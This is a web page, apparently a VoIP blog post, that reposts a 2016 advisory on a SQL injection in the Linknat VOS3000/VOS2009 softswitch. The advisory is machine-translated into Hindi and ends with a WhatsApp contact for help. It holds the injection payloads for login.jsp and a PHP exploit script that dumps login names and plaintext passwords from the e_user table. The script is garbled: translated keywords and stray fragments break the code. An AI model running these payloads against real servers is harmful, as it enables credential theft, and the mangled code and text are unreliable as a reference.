Linknat VOS2009/VOS3000 SQL इंजेक्शन
से: ओसामा खालिद <osama ()="" codinghazard="" com="">त
िथि: Thu, 19 मई २०१६ 16:52:54 + ०५००</osama>
एक एसक्यूएल इंजेक्शन Linknat VOS3000/VOS2009, एक लोकप्रिय वीओआईपी में पाया गया था सॉफ्टस्विच, जो दूरदराज के हमलावरों को पहुंच प्राप्त करने की अनुमति दे सकता है सादे पाठ में संग्रहीत साख। आवेदन: लिंकनट VOS3000/VOS2009 प्रभावित संस्करण: 2.1.1.5, 2.1.1.8, 2.1.2.0 विक्रेता यूआरएल: http://www.linknat.com/ बग: एसक्यूली (डीबीए विशेषाधिकारों के साथ) प्रकार: रिमोट रिज़ॉल्यूशन: फिक्स्ड, 2.1.2.4 या 2.1.6.0 स्वच्छ संस्करण में अपग्रेड करें संदर्भ: वूयून-2015-145458 - http://www.wooyun.org/bugs/wooyun-2010-0145458 SQLi रिपोर्ट समय आधारित अंधा है । चूंकि यह एक इन-बैंड SQLi नहीं है, परिणाम उसी के दौरान स्वागत के उत्पादन से इकट्ठा किया जा सकता है.jsp सत्र। (पहला अनुरोध) पद http://target/eng/login.jsp परम लॉगइनटाइप =1 नाम = ' संघ का चयन 1,2,@@version, 'नमस्ते', 5,6# पास =' या ''=' (इसी सत्र के दौरान दूसरा अनुरोध) http://target/eng/welcome.jsp जाओ परिणाम 0.' संघ का चयन 1,2,@@version, 'hello', 5,6 #.1.5.0.51a-community.hello.0.00.0.00. <?php # # Linknat [ EXPLOIT CODE ]VOS2009/VOS3000 SQLi exploit # # DISCLAIMER: The exploit is to be used for educational purposes only # The author would not be responsible for any misuse # # AUTHOR: Osama Khalid # WEBSITE: http://www.codinghazard.com/ # DATE: 19/05/2016 # REF: http://www.wooyun.org/bugs/wooyun-2010-0145458 if ($argc < 2) { banner(); usage(); exit; } $host = $argv; $column_one = isset[1]($argv) ? $argv : "loginname"[2]; $column_[2]two = isset($argv) ? $argv : "password"; [3]$table [3] = isset($argv) ? $argv : "e_user"; $o[4]ther [4] = isset($argv) ? $argv : ""; function[5] banner()[5] { echo "########################################n"; echo "# #n"; echo "# Linknat VOS3000/VOS2009 SQLi exploit #n"; echo "# #n"; echo "# Osama Khalid #n"; echo "########### codinghazard.com ###########n"; } function usage() { echo "n"; echo "php vos3000.php n"; echo "php vos3000.ph[HOST]p 127.0.0.1n"; echo "php vos3000.php n"; echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name information_schema.tables "where table_schema = 'mysql'" n"; } function curl($url, $post = array(), $cookies = null, $header = false) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false); curl_setopt($curl, CURLOPT_HEADER, $header); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); if ($cookies != null) curl_setopt($curl, CURLOPT_COOKIE, $cookies); if (count($post) > 0) { फोरच ($post $key = > $value) $post_आइटम = $key । '=' . यूरेनकोड ($value); []$post_स्ट्रिंग = फटना ('&', $post_आइटम); curl_setopt ($curl, CURLOPT_POST, 1); curl_setopt ($curl, CURLOPT_POSTFIELDS, $post_स्ट्रिंग); } $data = curl_exec ($curl); curl_close ($curl); $data लौटें; } फंक्शन क्वेरी ($host, $query) { $data = कर्ल ("http://$host/eng/login.jsp";, सरणी ( "लॉगिनटाइप" = > 1, "नाम" = > "संघ" । $query । "#", "पास" = > "' या '='" ), अशक्त, सच है); preg_match_all ('। सेट-कुकी: (.*);..यू', $data, $matches); $cookies = फटना ('; ', $matches); $data = कर्ल ("http://$host/eng/welcome.j[1]sp";, सरणी (), $cookies, झूठी); $parts = विस्फोट (".., ट्रिम ($data)); यदि (गिनती ($parts) < 7) return false; return array($parts, $parts); } function ascii_table($data) { $[3]keys = a[4]rray_keys(end($data)); $wid = array_map('strlen', $keys); foreach($data as $row) { foreach(array_values($row) as $k => $v) $wid = अधिकतम ($wid, स्ट्रेन ($v)); } फोरच ($k [$k]= > $v) के [$k]रूप में $wid { $fmt = "%-{$v}s"; $sep = str_repea[$k]t ('-', $v); } $fmt[$k] = '। ' . फटना (' । ', $fmt) । ' |'; $sep = '+-' । फटना ('-+-', $sep) । '-+'; $buf = सरणी ($sep, वेस्प्रिंट ($fmt, $keys), $sep); फोरच ($row के रूप में $data) { $buf = vsprintf ($fmt, $row); $[]buf = $sep; } वापसी फटना ("n[]", $buf); } बैनर (); गूंज "n"; गूंज "लक्ष्य: $host n"; गूंज "कॉलम #1: $column_onen"; गूंज "कॉलम #2: $column_दो n"; गूंज "तालिका: $table n"; गूंज "अन्य: $other n"; गूंज "n"; $results = सरणी (); $count_result = क्वेरी ($host, "1,2,काउंट (*), 4,5,6 से $table $other"); यदि ($count_result) { $count = intval ($count_result); गूंज "पंक्तियों $count पाया...n"; के लिए ($i = [0]0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table $other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" . hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) . " n";="" }="" else=[1]"" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_on[]e" ==""> hex2bin ($result), $column_two [0]=> हेक्स2बिन ($result)); } य[1]दि (गिनती ($results) > 0) { गूंज "nn" । ascii_table ($results) । "n"; } }अन्य { गूंज "त्रुटि पुनः प्राप्त पंक्ति गिनती"; } ?></$count;>
2016 से लोग VOS3000 हैक करने के लिए कुछ वर्ग इंजेक्शन सॉफ्ट माल का उपयोग करते हैं, हमारे पास उस समय से हमारी अपनी सुरक्षा प्रणाली है, हमने अपनी सुरक्षा प्रणाली को अपडेट किया है, अब हमने अपनी सुरक्षा प्रणाली को भी मजबूत किया है, मेरा काम ध्यान वीओआईपी सॉफ्ट-स्विच के लिए सुरक्षा के लिए हमेशा था। अधिकांश समय मैंने मुफ्त सलाह दी या जितना संभव हो उतना मुफ्त जानकारी साझा की। फिर भी बहुत सारी गंदी चीजें चल रही हैं, इसलिए कृपया हमेशा सावधान रहें और अधिक जानें। वरना आप कभी भी अच्छा बिजनेस नहीं कर पाएंगे। अब-एक दिन VOS सर्वर हैक करने के लिए VOS3000 क्लाइंट सॉफ्टवेयर में छिपी स्क्रिप्ट या मैलवेयर का उपयोग कर रहे लोग।
अधिक मदद के लिए मुझे whatsapp में दस्तक: + ८८०१९११११९९६६-मैं सभी तरीकों से मदद करेंगे ।
VOS3000 Caller Number Pool: Powerful CLI Rotation for Outbound Traffic The VOS3000 caller number pool feature solves a critical problem… Read More
VOS3000 Protect Route: Smart Backup Gateway Activation with Timer The VOS3000 protect route feature is one of the most misunderstood… Read More
VOS3000 outbound registration setup guide for carrier SIP trunk connections. Configure VOS3000 to register outbound to carriers, IMS, and ITSP… Read More
This website uses cookies.